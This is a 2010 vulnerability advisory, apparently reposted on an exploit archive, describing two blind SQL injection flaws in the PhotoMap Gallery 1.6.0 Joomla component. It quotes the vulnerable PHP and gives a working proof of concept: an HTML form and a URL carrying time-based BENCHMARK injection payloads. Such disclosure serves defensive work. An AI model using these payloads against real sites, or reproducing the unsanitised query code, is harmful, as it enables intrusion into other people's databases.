Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection

====================================================================
Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection
====================================================================


PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection
 
 Name              PhotoMap Gallery
 Vendor            http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
 Versions Affected 1.6.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-28
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
PhotoMap Gallery  is  a   gallery  component  completely
integrated  into  Joomla 1.5.x. Like 'Picasa', 'Flickr',
or 'Panoramio',  you  can  easily  add geo-tags  to your
photos  so  that  you can remember exactly where they're
from using Google Maps.
 
 
II. DESCRIPTION
_______________
 
Some parameters  are not properly sanitised before being
used in SQL queries.
 
 
III. ANALYSIS
_____________
 
Summary:
 
A) Multiple Blind SQL Injection
_______________________________
 
The parameter id passed to controller.php  via POST when
view is set to user and task is set to save_usercategory
is  not  properly sanitised  before being  used in a SQL
query. This  can  be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
 
The parameter folder passed to  imagehandler.php  is not
properly sanitised before used in a SQL query.  This can
be  exploited  to  manipulate  SQL  queries by injecting
arbitrary SQL code.
 
The following is the affected code.
 
controller.php (line 1135):
 
function save_usercategory() {
 
    // Check for request forgeries
    JRequest::checkToken() or jexit( 'Invalid Token' );
         
    $user           = & JFactory::getUser();
    $task           = JRequest::getVar('task');
    $post           = JRequest::get('post');
 
    //perform access checks
    $isNew = ($post['id']) ? false : true;
 
//  $catid = (int) JRequest::getVar('catid', 0);
         
    $db     =& JFactory::getDBO();
    $query = 'SELECT c.id, c.directory'
                . ' FROM #__g_categories AS c'
                . ' WHERE c.id = '.$post['id'];
 
 
imagehandler.php (line 109);
 
function getList() {
 
    static $list;
 
    // Only process the list once per request
    if (is_array($list)) {
        return $list;
    }
 
    // Get folder from request
    $folder = $this->getState('folder');
    $search = $this->getState('search');
 
    $query = 'SELECT *'
            . ' FROM #__g_categories'
            . ' WHERE id = '.$folder;
 
 
 
IV. SAMPLE CODE
_______________
 
A) Multiple Blind SQL Injection
 
Replace 89eb36eca1919aff534b13b54796c9a4 with your own.
 
<html>
    <head>
        <title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
    </head>
    <body>
        <form method="POST" action="http://127.0.0.1/joomla/index.php">
            <input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
            <input type="hidden" name="option" value="com_photomapgallery">
            <input type="hidden" name="controller" value="">
            <input type="hidden" name="view" value="user">
            <input type="hidden" name="task" value="save_usercategory">
            <input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
            <input type="submit">
        </form>
    </body>
</html>
 
 
http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
 
 
V. FIX
______
 
No fix.



#  0day.today [2018-01-10]  #